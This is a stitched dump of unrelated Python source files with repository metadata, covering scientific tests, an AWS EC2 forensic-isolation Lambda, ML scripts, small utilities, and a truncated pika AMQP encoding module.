np.zeros(self.alg.Np, dtype='bool') BC4_pores[[11, 90]] = True self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, pores=BC4_pores, mode='overwrite') ptest = self.alg.pores('pore.Neumann') assert np.all(ptest == self.alg._parse_locations(BC4_pores)) self.alg.set_boundary_conditions(bctype='Dirichlet', pores=BC1_pores, bcvalue=0.3) ptest = self.alg.pores('pore.Dirichlet') removed_p = self.alg._parse_locations(self.alg.Ps) self.alg.set_boundary_conditions(bctype='Dirichlet', pores=removed_p, mode='remove') Dp = np.sum(self.alg['pore.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'pore.Neumann' assert (label not in self.alg.labels()) def test_set_BC_modes_with_boolean_masks_throats(self): BC1_throats = np.zeros(self.alg.Nt, dtype='bool') BC1_throats[np.arange(25, 35)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC1_throats) t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == self.alg._parse_locations(BC1_throats)) BC2_throats = np.zeros(self.alg.Nt, dtype='bool') BC2_throats[np.arange(43, 50)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC2_throats, mode='merge') t_test = self.alg.throats('throat.Dirichlet') B1 = self.alg._parse_locations(BC1_throats) B2 = self.alg._parse_locations(BC2_throats) assert np.all(t_test == np.concatenate((B1, B2))) BC3_throats = np.zeros(self.alg.Nt, dtype='bool') BC3_throats[np.arange(4, 9)] = True self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.8, throats=BC3_throats, mode='overwrite') t_test = self.alg.throats('throat.Dirichlet') assert np.all(t_test == self.alg._parse_locations(BC3_throats)) BC4_throats = np.zeros(self.alg.Nt, dtype='bool') BC4_throats[[11, 90]] = True self.alg.set_boundary_conditions(bctype='Neumann', bcvalue=0.5, throats=BC4_throats, mode='overwrite') t_test = self.alg.throats('throat.Neumann') assert np.all(t_test == self.alg._parse_locations(BC4_throats)) self.alg.set_boundary_conditions(bctype='Dirichlet', throats=BC1_throats, bcvalue=0.3) t_test = self.alg.throats('throat.Dirichlet') removed_t = self.alg._parse_locations(self.alg.Ts) self.alg.set_boundary_conditions(bctype='Dirichlet', throats=removed_t, mode='remove') Dp = np.sum(self.alg['throat.Dirichlet']) assert Dp == 0 self.alg.set_boundary_conditions(bctype='Neumann', mode='remove') label = 'pore.Neumann' assert (label not in self.alg.labels()) def test_super_pore_conductance(self): g_super = [] BC1_pores = np.arange(20, 30) self.alg.set_boundary_conditions(bctype='Dirichlet', bcvalue=0.4, pores=BC1_pores) BC2_pores = np.arange(45, 66) self.alg.set_boundary_conditions(bctype='Neumann_group', bcvalue=1.4e-10, pores=BC2_pores) g_super.append(2e-12) BC3_pores = np.arange(87, 94) self.alg.set_boundary_conditions(bctype='Neumann_group', bcvalue=-0.9e-10, pores=BC3_pores) g_super.append(np.ones(len(BC3_pores)) * 1.5e-12) BC4_pores = np.arange(3, 7) self.alg.set_boundary_conditions(bctype='Neumann_group', bcvalue=0.1e-10, pores=BC4_pores) g_super.append(np.array([6.42e-13])) self.alg.run(conductance='throat.cond', quantity='pore.mole_fraction', super_pore_conductance=g_super) self.alg.return_results() r1 = self.alg.rate(BC1_pores)[0] r2 = self.alg.rate(BC2_pores)[0] r3 = self.alg.rate(BC3_pores)[0] r4 = self.alg.rate(BC4_pores)[0] assert np.absolute(r1 + r2 + r3 + r4) < 1e-20 assert np.size(self.alg.super_pore_conductance[0]) == 1 assert np.size(self.alg.super_pore_conductance[1]) == 7 assert np.size(self.alg.super_pore_conductance[2]) == 1 def test_source_term_modes(self): self.phys['pore.item1'] = 0.5e-12 self.phys['pore.item2'] = 2.5 self.phys['pore.item3'] = -1.4e-11 self.phys.models.add(propname='pore.A', model=pm.generic_source_term.power_law, A1='pore.item1', A2='pore.item2', A3='pore.item3', x='mole_fraction', return_rate=False, regen_mode='on_demand') self.phys.models.add(propname='pore.B', model=pm.generic_source_term.linear, A1='pore.item1', A2='pore.item3', x='mole_fraction', return_rate=False, regen_mode='on_demand') S1_pores = np.arange(25, 35) self.alg.set_source_term(source_name=['pore.A', 'pore.B'], pores=S1_pores) mask1 = ~np.isnan(self.alg['pore.source_nonlinear_s1_A']) mask2 = ~np.isnan(self.alg['pore.source_nonlinear_s2_A']) assert np.all(self.alg.Ps[mask1] == S1_pores) assert np.all(self.alg.Ps[mask2] == S1_pores) self.alg.set_source_term(source_name='pore.A', pores=[26], x0=np.ones(self.phys.Np), mode='update') assert self.alg['pore.source_nonlinear_s1_A'][26] == 1.25e-12 S2_pores = np.array([30, 31]) self.alg.set_source_term(source_name='pore.A', pores=S2_pores, mode='overwrite') mask1 = ~np.isnan(self.alg['pore.source_nonlinear_s1_A']) assert np.all(self.alg.Ps[mask1] == S2_pores) self.alg.set_source_term(source_name='pore.B', pores=S1_pores, mode='remove') mask1 = np.isnan(self.alg['pore.source_nonlinear_s1_B']) assert np.all(self.alg.Ps[mask1] == self.alg.Ps) self.alg.set_source_term(source_name=['pore.A', 'pore.B'], pores=self.alg.Ps, mode='remove') assert ('pore.source_B' in self.alg.labels()) assert ('pore.source_A' in self.alg.labels()) self.alg.set_source_term(source_name=['pore.A', 'pore.B'], mode='remove') assert ('pore.source_B' not in self.alg.labels()) assert ('pore.source_A' not in self.alg.labels())
51.101754
78
0.49025
14,491
0.994988
0
0
0
0
0
0
1,559
0.107045
fe3002f8ab77d8668df51f08f7789bc9628e8c1f
2,370
py
Python
EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py
spartantri/aws-security-automation
a3904931220111022d12e71a3d79e4a85fc82173
[ "Apache-2.0" ]
null
null
null
EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py
spartantri/aws-security-automation
a3904931220111022d12e71a3d79e4a85fc82173
[ "Apache-2.0" ]
null
null
null
EC2 Auto Clean Room Forensics/Lambda-Functions/snapshotForRemediation.py
spartantri/aws-security-automation
a3904931220111022d12e71a3d79e4a85fc82173
[ "Apache-2.0" ]
null
null
null
# MIT No Attribution # Permission is hereby granted, free of charge, to any person obtaining a copy of this # software and associated documentation files (the "Software"), to deal in the Software # without restriction, including without limitation the rights to use, copy, modify, # merge, publish, distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, # INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A # PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT # HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. import boto3 import os def lambda_handler(event, context): # TODO implement print(event) client = boto3.client('ec2') instanceID = event.get('instanceID') response = client.describe_instances( InstanceIds=[ instanceID ] ) volumeID = response['Reservations'][0]['Instances'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeId'] print(volumeID) SnapShotDetails = client.create_snapshot( Description='Isolated Instance', VolumeId=volumeID ) client.create_tags(Resources=[SnapShotDetails['SnapshotId']], Tags=[{'Key': 'Name', 'Value': instanceID}]) # TODO Dump Response into S3 - response # TODO Dump Response details into Snapshot - SnapShotDetails['SnapshotId'] print(response) print(SnapShotDetails['SnapshotId']) response = client.modify_instance_attribute( Groups=[ os.environ['ISOLATED_SECUTRITYGROUP'], ], InstanceId=instanceID ) tagresponse = client.create_tags( Resources=[ instanceID, ], Tags=[ { 'Key': 'IsIsolated', 'Value': 'InstanceIsolated' }, ] ) waiter = client.get_waiter('snapshot_completed') waiter.wait( SnapshotIds=[ SnapShotDetails['SnapshotId'], ] ) # event['SnapshotId'] = SnapShotDetails['SnapshotId'] return SnapShotDetails['SnapshotId']
33.857143
110
0.670042
0
0
0
0
0
0
0
0
1,321
0.557384
fe30812932f608889eaceef38afb76f593b3db27
3,830
py
Python
gpu_bdb/queries/q26/gpu_bdb_query_26.py
VibhuJawa/gpu-bdb
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
[ "Apache-2.0" ]
62
2020-05-14T13:33:02.000Z
2020-10-29T13:28:26.000Z
gpu_bdb/queries/q26/gpu_bdb_query_26.py
VibhuJawa/gpu-bdb
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
[ "Apache-2.0" ]
104
2020-07-01T21:07:42.000Z
2020-11-13T16:36:04.000Z
gpu_bdb/queries/q26/gpu_bdb_query_26.py
VibhuJawa/gpu-bdb
13987b4ef8b92db3b9d2905dec7bd2fd81f42ae9
[ "Apache-2.0" ]
21
2020-05-14T14:44:40.000Z
2020-11-07T12:08:28.000Z
# # Copyright (c) 2019-2022, NVIDIA CORPORATION. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from bdb_tools.utils import ( benchmark, gpubdb_argparser, train_clustering_model, run_query, ) from bdb_tools.q26_utils import ( Q26_CATEGORY, Q26_ITEM_COUNT, N_CLUSTERS, CLUSTER_ITERATIONS, N_ITER, read_tables ) import numpy as np from dask import delayed def agg_count_distinct(df, group_key, counted_key): """Returns a Series that is the result of counting distinct instances of 'counted_key' within each 'group_key'. The series' index will have one entry per unique 'group_key' value. Workaround for lack of nunique aggregate function on Dask df. """ return ( df.drop_duplicates([group_key, counted_key]) .groupby(group_key)[counted_key] .count() ) def get_clusters(client, kmeans_input_df): import dask_cudf ml_tasks = [ delayed(train_clustering_model)(df, N_CLUSTERS, CLUSTER_ITERATIONS, N_ITER) for df in kmeans_input_df.to_delayed() ] results_dict = client.compute(*ml_tasks, sync=True) output = kmeans_input_df.index.to_frame().reset_index(drop=True) labels_final = dask_cudf.from_cudf( results_dict["cid_labels"], npartitions=output.npartitions ) output["label"] = labels_final.reset_index()[0] # Sort based on CDH6.1 q26-result formatting output = output.sort_values(["ss_customer_sk"]) # Based on CDH6.1 q26-result formatting results_dict["cid_labels"] = output return results_dict def main(client, config): import cudf ss_ddf, items_ddf = benchmark( read_tables, config=config, compute_result=config["get_read_time"], ) items_filtered = items_ddf[items_ddf.i_category == Q26_CATEGORY].reset_index( drop=True ) items_filtered = items_filtered[["i_item_sk", "i_class_id"]] f_ss_ddf = ss_ddf[ss_ddf["ss_customer_sk"].notnull()].reset_index(drop=True) merged_ddf = f_ss_ddf.merge( items_filtered, left_on="ss_item_sk", right_on="i_item_sk", how="inner" ) keep_cols = ["ss_customer_sk", "i_class_id"] merged_ddf = merged_ddf[keep_cols] # One-Hot-Encode i_class_id merged_ddf = merged_ddf.map_partitions( cudf.get_dummies, columns=["i_class_id"], prefix="id", cats={"i_class_id": np.arange(1, 16, dtype="int32")}, prefix_sep="", dtype="float32", ) merged_ddf["total"] = 1.0 # Will keep track of total count all_categories = ["total"] + ["id%d" % i for i in range(1, 16)] # Aggregate using agg to get sorted ss_customer_sk agg_dict = dict.fromkeys(all_categories, "sum") rollup_ddf = merged_ddf.groupby("ss_customer_sk").agg(agg_dict) rollup_ddf = rollup_ddf[rollup_ddf.total > Q26_ITEM_COUNT][all_categories[1:]] # Prepare data for KMeans clustering rollup_ddf = rollup_ddf.astype("float64") kmeans_input_df = rollup_ddf.persist() results_dict = get_clusters(client=client, kmeans_input_df=kmeans_input_df) return results_dict if __name__ == "__main__": from bdb_tools.cluster_startup import attach_to_cluster config = gpubdb_argparser() client, bc = attach_to_cluster(config) run_query(config=config, client=client, query_func=main)
31.138211
115
0.703655
0
0
0
0
0
0
0
0
1,332
0.347781
fe317187c1c12b8c77ea5e51802f388e760744e4
1,324
py
Python
tests/test_intbounds.py
alex/optimizer-model
0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98
[ "BSD-3-Clause" ]
4
2015-04-29T22:49:25.000Z
2018-02-16T09:06:08.000Z
tests/test_intbounds.py
alex/optimizer-model
0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98
[ "BSD-3-Clause" ]
null
null
null
tests/test_intbounds.py
alex/optimizer-model
0e40a0763082f5fe0bd596e8e77ebccbcd7f4a98
[ "BSD-3-Clause" ]
null
null
null
from optimizer.utils.intbounds import IntBounds class TestIntBounds(object): def test_make_gt(self): i0 = IntBounds() i1 = i0.make_gt(IntBounds(10, 10)) assert i1.lower == 11 def test_make_gt_already_bounded(self): i0 = IntBounds() i1 = i0.make_gt(IntBounds(10, 10)).make_gt(IntBounds(0, 0)) assert i1.lower == 11 def test_make_lt(self): i0 = IntBounds() i1 = i0.make_lt(IntBounds(10, 10)) assert i1.upper == 9 def test_make_lt_already_bounded(self): i0 = IntBounds() i1 = i0.make_lt(IntBounds(0, 0)).make_lt(IntBounds(10, 10)) assert i1.upper == -1 def test_both_bounds(self): i0 = IntBounds() i1 = i0.make_lt(IntBounds(10, 10)).make_gt(IntBounds(0, 0)) assert i1.upper == 9 assert i1.lower == 1 i2 = i0.make_gt(IntBounds(0, 0)).make_lt(IntBounds(10, 10)) assert i2.lower == 1 assert i2.upper == 9 def test_make_le_already_bounded(self): i0 = IntBounds() i1 = i0.make_le(IntBounds(0, 0)).make_le(IntBounds(2, 2)) assert i1.upper == 0 def test_make_ge_already_bounded(self): i0 = IntBounds() i1 = i0.make_ge(IntBounds(10, 10)).make_ge(IntBounds(0, 0)) assert i1.lower == 10
23.22807
67
0.5929
1,273
0.96148
0
0
0
0
0
0
0
0
fe3188f73830a0839c72948677e1605c9ae2ae83
1,586
py
Python
tdclient/test/database_model_test.py
minchuang/td-client-python
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
[ "Apache-2.0" ]
2
2019-02-22T11:56:17.000Z
2019-02-25T10:09:46.000Z
tdclient/test/database_model_test.py
minchuang/td-client-python
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
[ "Apache-2.0" ]
null
null
null
tdclient/test/database_model_test.py
minchuang/td-client-python
6cf6dfbb60119f400274491d3e942d4f9fbcebd6
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python from __future__ import print_function from __future__ import unicode_literals try: from unittest import mock except ImportError: import mock from tdclient import models from tdclient.test.test_helper import * def setup_function(function): unset_environ() def test_database(): client = mock.MagicMock() database = models.Database(client, "sample_datasets", tables=["nasdaq", "www_access"], count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator") assert database.org_name == "org_name" assert database.permission == "administrator" assert database.count == 12345 assert database.name == "sample_datasets" assert database.tables() == ["nasdaq", "www_access"] assert database.created_at == "created_at" assert database.updated_at == "updated_at" def test_database_update_tables(): client = mock.MagicMock() client.tables = mock.MagicMock(return_value=[ models.Table(client, "sample_datasets", "foo", "type", "schema", "count"), models.Table(client, "sample_datasets", "bar", "type", "schema", "count"), models.Table(client, "sample_datasets", "baz", "type", "schema", "count"), ]) database = models.Database(client, "sample_datasets", tables=None, count=12345, created_at="created_at", updated_at="updated_at", org_name="org_name", permission="administrator") tables = database.tables() assert [ table.name for table in tables ] == ["foo", "bar", "baz"] client.tables.assert_called_with("sample_datasets")
40.666667
202
0.713745
0
0
0
0
0
0
0
0
420
0.264817
fe31f26debb52795b22561b36355ce06ff7905d8
558
py
Python
setup.py
ballcap231/fireTS
74cc89a14d67edabf31139d1552025d54791f2a9
[ "MIT" ]
null
null
null
setup.py
ballcap231/fireTS
74cc89a14d67edabf31139d1552025d54791f2a9
[ "MIT" ]
null
null
null
setup.py
ballcap231/fireTS
74cc89a14d67edabf31139d1552025d54791f2a9
[ "MIT" ]
null
null
null
from setuptools import setup dependencies = [ 'numpy', 'scipy', 'scikit-learn', ] setup( name='fireTS', version='0.0.7', description='A python package for multi-variate time series prediction', long_description=open('README.md').read(), long_description_content_type="text/markdown", url='https://github.com/jxx123/fireTS.git', author='Jinyu Xie', author_email='[email protected]', license='MIT', packages=['fireTS'], install_requires=dependencies, include_package_data=True, zip_safe=False)
24.26087
76
0.677419
0
0
0
0
0
0
0
0
209
0.374552
fe3273d41978521818a7243089a132072ef92c5a
883
py
Python
euler/py/project_019.py
heyihan/scodes
342518b548a723916c9273d8ebc1b345a0467e76
[ "BSD-3-Clause" ]
null
null
null
euler/py/project_019.py
heyihan/scodes
342518b548a723916c9273d8ebc1b345a0467e76
[ "BSD-3-Clause" ]
null
null
null
euler/py/project_019.py
heyihan/scodes
342518b548a723916c9273d8ebc1b345a0467e76
[ "BSD-3-Clause" ]
null
null
null
# https://projecteuler.net/problem=19 def is_leap(year): if year%4 != 0: return False if year%100 == 0 and year%400 != 0: return False return True def year_days(year): if is_leap(year): return 366 return 365 def month_days(month, year): if month == 4 or month == 6 or month == 9 or month == 11: return 30 if month == 2: if is_leap(year): return 29 return 28 return 31 day_19000101 = 1 days_1900 = year_days(1900) day_next_day1 = (day_19000101 + days_1900)%7 print(day_19000101, days_1900, day_next_day1) sum = 0 for i in range(1901, 2001): for j in range(1, 13): if day_next_day1 == 0: print(i, j) sum = sum + 1 days = month_days(j, i) day_next_day1 = (day_next_day1 + days)%7 #print(i, j, days, day_next_day1) print(sum)
20.534884
61
0.582106
0
0
0
0
0
0
0
0
70
0.079275
fe32cc9e555895354fe2279db255494d9b4433fb
1,652
py
Python
address_book/address_book.py
wowsuchnamaste/address_book
4877d16d795c54b750e151fa93e69c080717ae72
[ "MIT" ]
null
null
null
address_book/address_book.py
wowsuchnamaste/address_book
4877d16d795c54b750e151fa93e69c080717ae72
[ "MIT" ]
null
null
null
address_book/address_book.py
wowsuchnamaste/address_book
4877d16d795c54b750e151fa93e69c080717ae72
[ "MIT" ]
null
null
null
"""A simple address book.""" from ._tools import generate_uuid class AddressBook: """ A simple address book. """ def __init__(self): self._entries = [] def add_entry(self, entry): """Add an entry to the address book.""" self._entries.append(entry) def get_entries(self): """Returns a list of all entries in the address book. :return: ``list`` of ``Person`` objects. """ return self._entries def get_entry(self, name): entry = [entry for entry in self._entries if entry.name == name] return entry[0] class Entry: def __init__( self, name, first_name=None, last_name=None, address=None, phone_number=None, email=None, organization=None, ): self._uuid = generate_uuid() self.name = name self.first_name = first_name self.last_name = last_name self._parse_name(name) self.address = address self.phone_number = phone_number self.email = email self.organization = organization def __repr__(self): return self.name def _parse_name(self, name): """ Parse whatever is passed as ``name`` and update ``self.name`` from that. :param name: A person's name as string or dictionary. :return: The method doesn't return anything. """ if type(name) == dict: self.first_name = name["first_name"] self.last_name = name["last_name"] self.name = self.first_name + " " + self.last_name
25.415385
80
0.565981
1,583
0.958232
0
0
0
0
0
0
458
0.27724
fe3415df5ab13d93fe351122344f2bd2d2fe4c5f
3,839
py
Python
inference.py
zzhang87/ChestXray
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
[ "MIT" ]
null
null
null
inference.py
zzhang87/ChestXray
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
[ "MIT" ]
11
2020-01-28T21:44:26.000Z
2022-03-11T23:19:37.000Z
inference.py
zzhang87/ChestXray
eaafe2f7f5e91bb30fbed02dec1f77ff314434b5
[ "MIT" ]
null
null
null
import keras import numpy as np import pandas as pd import cv2 import os import json import pdb import argparse import math import copy from vis.visualization import visualize_cam, overlay, visualize_activation from vis.utils.utils import apply_modifications from shutil import rmtree import matplotlib.cm as cm from matplotlib import pyplot as plt from sklearn import metrics import keras.backend as K from keras import activations from keras.applications.inception_v3 import preprocess_input as inception_pre from keras.applications.mobilenet import preprocess_input as mobilenet_pre from keras.applications.resnet50 import preprocess_input as resnet_pre from keras.applications.densenet import preprocess_input as densenet_pre from datagenerator import ImageDataGenerator from utils import load_model def getCAM(model, image): # weights of the final fully-connected layer weights = model.layers[-1].get_weights()[0] # activation before the last global pooling for layer in reversed(model.layers): if len(layer.output_shape) > 2: break function = K.function([model.layers[0].input, K.learning_phase()], [layer.output]) activation = np.squeeze(function([image, 0])[0]) # weighted sum of the activation map CAM = np.dot(activation, weights) return CAM def main(): ap = argparse.ArgumentParser() ap.add_argument('--ckpt_path', help = 'Path to the model checkpoint.') ap.add_argument('--image_path', help = 'Path to the image to run inference on.') ap.add_argument('--bnbox', help = 'Path to the bounding box annotation, if applies.') ap.add_argument('--threshold', default = 0.5, help = 'Threshold for displaying the Class Activation Map.') args = ap.parse_args() model_dir = os.path.dirname(args.ckpt_path) with open(os.path.join(model_dir, 'label_map.json'), 'r') as f: label_map = json.load(f) num_class = len(list(label_map.keys())) model, model_config = load_model(model_dir, args.ckpt_path) model_name = model_config['model_name'] if model_name in ['inception']: image_size = 299 else: image_size = 224 preprocess_input = { 'inception': inception_pre, 'resnet': resnet_pre, 'mobilenet': mobilenet_pre, 'densenet': densenet_pre } if args.bnbox is not None: annotation = pd.read_csv(args.bnbox) image_index = os.path.basename(args.image_path) indices = np.where(annotation['Image Index'] == image_index)[0] bnbox = {} for i in indices: disease = annotation['Finding Label'][i] x = int(annotation['Bbox [x'][i] + 0.5) y = int(annotation['y'][i] + 0.5) w = int(annotation['w'][i] + 0.5) h = int(annotation['h]'][i] + 0.5) bnbox[disease] = [x, y, x + w, y + h] image = cv2.imread(args.image_path) img = cv2.resize(image, (image_size, image_size)) img = preprocess_input[model_name](img.astype(np.float32)) img = np.expand_dims(img, axis = 0) predictions = np.squeeze(model.predict(img)) CAM = getCAM(model, img) cv2.namedWindow("ChestXray", cv2.WINDOW_NORMAL) for key, value in label_map.items(): heatmap = CAM[:,:,int(key)] heatmap -= heatmap.min() heatmap *= 255.0 / heatmap.max() heatmap[np.where(heatmap < args.threshold * 255)] *= 0.1 heatmap = cv2.applyColorMap(heatmap.astype(np.uint8), cv2.COLORMAP_JET) heatmap = cv2.resize(heatmap, image.shape[:2], cv2.INTER_AREA) overlay_img = overlay(heatmap, image, alpha = 0.4) cv2.putText(overlay_img, "{}: {:.2%}".format(value, predictions[int(key)]), (30,30), cv2.FONT_HERSHEY_DUPLEX, 1.0, (255,255,255), 2) if value in bnbox.keys(): box = bnbox[value] cv2.rectangle(overlay_img, (box[0], box[1]), (box[2], box[3]), color = (0, 180, 0), thickness = 2) cv2.imshow("ChestXray", overlay_img) cv2.waitKey() plt.show() print('{}: {:.2%}'.format(value, predictions[int(key)])) cv2.destroyAllWindows() if __name__ == "__main__": main()
27.035211
107
0.716593
0
0
0
0
0
0
0
0
530
0.138057
fe34376d96d5593399f4f9364cf5da83ea7d813b
530
py
Python
test/DQueueTest.py
MistSun-Chen/py_verifier
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
[ "MIT" ]
null
null
null
test/DQueueTest.py
MistSun-Chen/py_verifier
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
[ "MIT" ]
null
null
null
test/DQueueTest.py
MistSun-Chen/py_verifier
7e9161d1fdbb611fe4be5eeb2f89a6286fa7b555
[ "MIT" ]
null
null
null
from libTask import Queue from common import configParams from common import common def main(): cp = configParams.ConfigParams("config.json") detectGeneralQueue = Queue.DQueue(cp, len(cp.detect_general_ids), cp.modelPath, common.GENERALDETECT_METHOD_ID, cp.GPUDevices, cp.detect_general_ids) print("Run Into Next step") smokeQueue = Queue.DQueue(cp, len(cp.smoke_ids), cp.modelPath, common.PEOPLESMOKE_METHOD_ID,cp.GPUDevices, cp.smoke_ids) if __name__ == '__main__': main()
35.333333
124
0.718868
0
0
0
0
0
0
0
0
43
0.081132
fe358e9590f17c8d7c10eb92232dc2f7d4b20167
235
py
Python
config.py
volgachen/Chinese-Tokenization
467e08da6fe271b6e33258d5aa6682c0405a3f32
[ "Apache-2.0" ]
null
null
null
config.py
volgachen/Chinese-Tokenization
467e08da6fe271b6e33258d5aa6682c0405a3f32
[ "Apache-2.0" ]
null
null
null
config.py
volgachen/Chinese-Tokenization
467e08da6fe271b6e33258d5aa6682c0405a3f32
[ "Apache-2.0" ]
1
2020-07-12T10:38:34.000Z
2020-07-12T10:38:34.000Z
class Config: ngram = 2 train_set = "data/rmrb.txt" modified_train_set = "data/rmrb_modified.txt" test_set = "" model_file = "" param_file = "" word_max_len = 10 proposals_keep_ratio = 1.0 use_re = 1 subseq_num = 15
21.363636
47
0.67234
235
1
0
0
0
0
0
0
45
0.191489
fe3599447ec843cd5c9296bccc205dff470707c7
1,417
py
Python
src/Knn-Tensor.py
python-itb/knn-from-scratch
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
[ "MIT" ]
null
null
null
src/Knn-Tensor.py
python-itb/knn-from-scratch
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
[ "MIT" ]
2
2018-03-20T06:47:32.000Z
2018-10-25T10:54:08.000Z
src/Knn-Tensor.py
python-itb/knn-from-scratch
dbc6fb53cffb245a76d35b9ff85ac8cb21877ca8
[ "MIT" ]
4
2018-03-20T06:43:11.000Z
2019-04-15T16:34:28.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Feb 13 18:52:28 2018 @author: amajidsinar """ from sklearn import datasets import matplotlib.pyplot as plt import numpy as np plt.style.use('seaborn-white') iris = datasets.load_iris() dataset = iris.data # only take 0th and 1th column for X data_known = iris.data[:,:2] # y label_known = iris.target # the hard part # so matplotlib does not readily support labeling based on class # but we know that one of the feature of plt is that a plt call would give those set of number # the same color category = np.unique(label_known) for i in category: plt.scatter(data_known[label_known==i][:,0],data_known[label_known==i][:,1],label=i) # Unknown class of a data data_unknown = np.array([[5.7,3.3],[5.6,3.4],[6.4,3],[8.2,2.2]]) plt.scatter(data_unknown[:,0],data_unknown[:,1], label='?') plt.legend() #------------- # Euclidean Distance diff = data_known - data_unknown.reshape(data_unknown.shape[0],1,data_unknown.shape[1]) distance = (diff**2).sum(2) #return sorted index of distance dist_index = np.argsort(distance) label = label_known[dist_index] #for k in [1,2,3,4,5,6,7,8,9,10]: #keep the rank k = 10 label = label[:,:k] label_predict = [] for i in range(data_unknown.shape[0]): values,counts = np.unique(label[i], return_counts=True) ind = np.argmax(counts) label_predict.append(values[ind])
21.149254
94
0.687368
0
0
0
0
0
0
0
0
494
0.348624
fe35a3606e5ec595f8753af44fd793743da1ae33
2,135
py
Python
de_test_tron2.py
volpepe/detectron2-ResNeSt
1481d50880baa615b873b7a18156c06a5606a85c
[ "Apache-2.0" ]
null
null
null
de_test_tron2.py
volpepe/detectron2-ResNeSt
1481d50880baa615b873b7a18156c06a5606a85c
[ "Apache-2.0" ]
null
null
null
de_test_tron2.py
volpepe/detectron2-ResNeSt
1481d50880baa615b873b7a18156c06a5606a85c
[ "Apache-2.0" ]
null
null
null
import torch, torchvision import detectron2 from detectron2.utils.logger import setup_logger setup_logger() # import some common libraries import numpy as np import os, json, cv2, random # import some common detectron2 utilities from detectron2 import model_zoo from detectron2.engine import DefaultPredictor from detectron2.config import get_cfg from detectron2.utils.visualizer import Visualizer from detectron2.data import MetadataCatalog, DatasetCatalog import argparse, time def parse_args(): p = argparse.ArgumentParser() p.add_argument("-i", "--image", type=str, help="Path to image to segment") p.add_argument("-m", "--model", type=str, help="Model to use", default="COCO-InstanceSegmentation/mask_cascade_rcnn_ResNeSt_200_FPN_syncBN_all_tricks_3x.yaml") p.add_argument("-t", "--threshold", type=float, help="Threshold for model detections", default=0.4) p.add_argument("-rs", "--use_resnest", type=bool, help="Whether the selected model uses ResNeSt backbone or no", default=True) return p.parse_args() def start_segment(args): img = args.image model = args.model thresh = args.threshold use_resnest = args.use_resnest im = cv2.imread(img) # get default cfg file cfg = get_cfg() # replace cfg from specific model yaml file cfg.merge_from_file(model_zoo.get_config_file(model)) cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = thresh # set threshold for this model # Find a model from detectron2's model zoo. You can use the https://dl.fbaipublicfiles... url as well cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(model, resnest=use_resnest) predictor = DefaultPredictor(cfg) start = time.time() outputs = predictor(im) print("Time eplased: {}".format(time.time() - start)) v = Visualizer(im[:, :, ::-1], MetadataCatalog.get(cfg.DATASETS.TRAIN[0]), scale=1.2) #rgb image (::-1) out = v.draw_instance_predictions(outputs["instances"].to("cpu")) cv2.imwrite("output.jpg", out.get_image()[:, :, ::-1]) if __name__ == "__main__": args = parse_args() start_segment(args)
40.283019
164
0.710539
0
0
0
0
0
0
0
0
625
0.29274
fe35e371f2d0a2c205ae69e2ee6c811fd9ed1de5
8,916
py
Python
pika/data.py
Pankrat/pika
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
[ "BSD-3-Clause" ]
null
null
null
pika/data.py
Pankrat/pika
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
[ "BSD-3-Clause" ]
null
null
null
pika/data.py
Pankrat/pika
9f62cbe032e9b4fa0fe1842587ce0702c3926a3d
[ "BSD-3-Clause" ]
null
null
null
"""AMQP Table Encoding/Decoding""" import struct import decimal import calendar from datetime import datetime from pika import exceptions from pika.compat import unicode_type, PY2, long, as_bytes def encode_short_string(pieces, value): """Encode a string value as short string and append it to pieces list returning the size of the encoded value. :param list pieces: Already encoded values :param value: String value to encode :type value: str or unicode :rtype: int """ encoded_value = as_bytes(value) length = len(encoded_value) # 4.2.5.3 # Short strings, stored as an 8-bit unsigned integer length followed by zero # or more octets of data. Short strings can carry up to 255 octets of UTF-8 # data, but may not contain binary zero octets. # ... # 4.2.5.5 # The server SHOULD validate field names and upon receiving an invalid field # name, it SHOULD signal a connection exception with reply code 503 (syntax # error). # -> validate length (avoid truncated utf-8 / corrupted data), but 